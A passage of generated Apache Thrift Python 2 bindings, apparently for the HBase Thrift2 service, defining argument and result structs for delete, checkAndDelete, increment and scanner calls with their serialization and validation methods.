    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('putMultiple_result')
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class deleteSingle_args:
  """Thrift argument struct for deleteSingle.

  Attributes:
   - table: the table to delete from
   - deleteSingle: the TDelete to delete
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 2
  )

  def __init__(self, table=None, deleteSingle=None,):
    self.table = table
    self.deleteSingle = deleteSingle

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.deleteSingle = TDelete()
          self.deleteSingle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('deleteSingle_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.deleteSingle is not None:
      oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 2)
      self.deleteSingle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field ('table' or 'deleteSingle') is unset."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.deleteSingle is None:
      raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class deleteSingle_result:
  """Thrift result struct for deleteSingle (void call; only carries an optional error).

  Attributes:
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, io=None,):
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('deleteSingle_result')
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class deleteMultiple_args:
  """Thrift argument struct for deleteMultiple.

  Attributes:
   - table: the table to delete from
   - deletes: list of TDeletes to delete
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.LIST, 'deletes', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 2
  )

  def __init__(self, table=None, deletes=None,):
    self.table = table
    self.deletes = deletes

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          self.deletes = []
          # Read _size63 TDelete elements into self.deletes.
          (_etype66, _size63) = iprot.readListBegin()
          for _i67 in xrange(_size63):
            _elem68 = TDelete()
            _elem68.read(iprot)
            self.deletes.append(_elem68)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('deleteMultiple_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.deletes is not None:
      oprot.writeFieldBegin('deletes', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.deletes))
      for iter69 in self.deletes:
        iter69.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field ('table' or 'deletes') is unset."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.deletes is None:
      raise TProtocol.TProtocolException(message='Required field deletes is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class deleteMultiple_result:
  """Thrift result struct for deleteMultiple.

  Attributes:
   - success: list of TDelete on success
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          # Read _size70 TDelete elements into self.success.
          (_etype73, _size70) = iprot.readListBegin()
          for _i74 in xrange(_size70):
            _elem75 = TDelete()
            _elem75.read(iprot)
            self.success.append(_elem75)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('deleteMultiple_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter76 in self.success:
        iter76.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class checkAndDelete_args:
  """Thrift argument struct for checkAndDelete.

  Attributes:
   - table: to check in and delete from
   - row: row to check
   - family: column family to check
   - qualifier: column qualifier to check
   - value: the expected value, if not provided the
  check is for the non-existence of the
  column in question
   - deleteSingle: the TDelete to execute if the check succeeds
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRING, 'row', None, None, ), # 2
    (3, TType.STRING, 'family', None, None, ), # 3
    (4, TType.STRING, 'qualifier', None, None, ), # 4
    (5, TType.STRING, 'value', None, None, ), # 5
    (6, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 6
  )

  def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, deleteSingle=None,):
    self.table = table
    self.row = row
    self.family = family
    self.qualifier = qualifier
    self.value = value
    self.deleteSingle = deleteSingle

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.row = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.family = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.qualifier = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRING:
          self.value = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.STRUCT:
          self.deleteSingle = TDelete()
          self.deleteSingle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('checkAndDelete_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.row is not None:
      oprot.writeFieldBegin('row', TType.STRING, 2)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    if self.family is not None:
      oprot.writeFieldBegin('family', TType.STRING, 3)
      oprot.writeString(self.family)
      oprot.writeFieldEnd()
    if self.qualifier is not None:
      oprot.writeFieldBegin('qualifier', TType.STRING, 4)
      oprot.writeString(self.qualifier)
      oprot.writeFieldEnd()
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.STRING, 5)
      oprot.writeString(self.value)
      oprot.writeFieldEnd()
    if self.deleteSingle is not None:
      oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 6)
      self.deleteSingle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field is unset.

    'value' is deliberately not checked: it is optional (absence means the
    check is for non-existence of the column).
    """
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.row is None:
      raise TProtocol.TProtocolException(message='Required field row is unset!')
    if self.family is None:
      raise TProtocol.TProtocolException(message='Required field family is unset!')
    if self.qualifier is None:
      raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
    if self.deleteSingle is None:
      raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class checkAndDelete_result:
  """Thrift result struct for checkAndDelete.

  Attributes:
   - success: bool, whether the check passed and the delete was applied
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('checkAndDelete_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class increment_args:
  """Thrift argument struct for increment.

  Attributes:
   - table: the table to increment the value on
   - increment: the TIncrement to increment
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'increment', (TIncrement, TIncrement.thrift_spec), None, ), # 2
  )

  def __init__(self, table=None, increment=None,):
    self.table = table
    self.increment = increment

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.increment = TIncrement()
          self.increment.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('increment_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.increment is not None:
      oprot.writeFieldBegin('increment', TType.STRUCT, 2)
      self.increment.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field ('table' or 'increment') is unset."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.increment is None:
      raise TProtocol.TProtocolException(message='Required field increment is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class increment_result:
  """Thrift result struct for increment.

  Attributes:
   - success: TResult on success
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    (0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = TResult()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('increment_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class openScanner_args:
  """
  Attributes:
   - table: the table to get the Scanner for
   - scan: the scan object to get a Scanner for
  """
  # Field descriptors indexed by thrift field id (slot 0 unused).
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'scan', (TScan, TScan.thrift_spec), None, ), # 2
  )
  def __init__(self, table=None, scan=None,):
    self.table = table
    self.scan = scan
  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path via the C fastbinary extension when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.scan = TScan()
          self.scan.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('openScanner_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.scan is not None:
      oprot.writeFieldBegin('scan', TType.STRUCT, 2)
      self.scan.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is missing."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.scan is None:
      raise TProtocol.TProtocolException(message='Required field scan is unset!')
    return
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class openScanner_result:
  """
  Attributes:
   - success
   - io
  """
  # Field descriptors: slot 0 carries the i32 scanner id returned on success.
  thrift_spec = (
    (0, TType.I32, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io
  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I32:
          self.success = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('openScanner_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.I32, 0)
      oprot.writeI32(self.success)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """No required fields: always passes."""
    return
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getScannerRows_args:
  """
  Attributes:
   - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
   - numRows: number of rows to return
  """
  # Field descriptors indexed by thrift field id (slot 0 unused).
  # numRows carries a default of 1 in its descriptor's default slot.
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'scannerId', None, None, ), # 1
    (2, TType.I32, 'numRows', None, 1, ), # 2
  )
  # numRows default is pulled from thrift_spec[2][4] (i.e. 1).
  def __init__(self, scannerId=None, numRows=thrift_spec[2][4],):
    self.scannerId = scannerId
    self.numRows = numRows
  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.scannerId = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.numRows = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
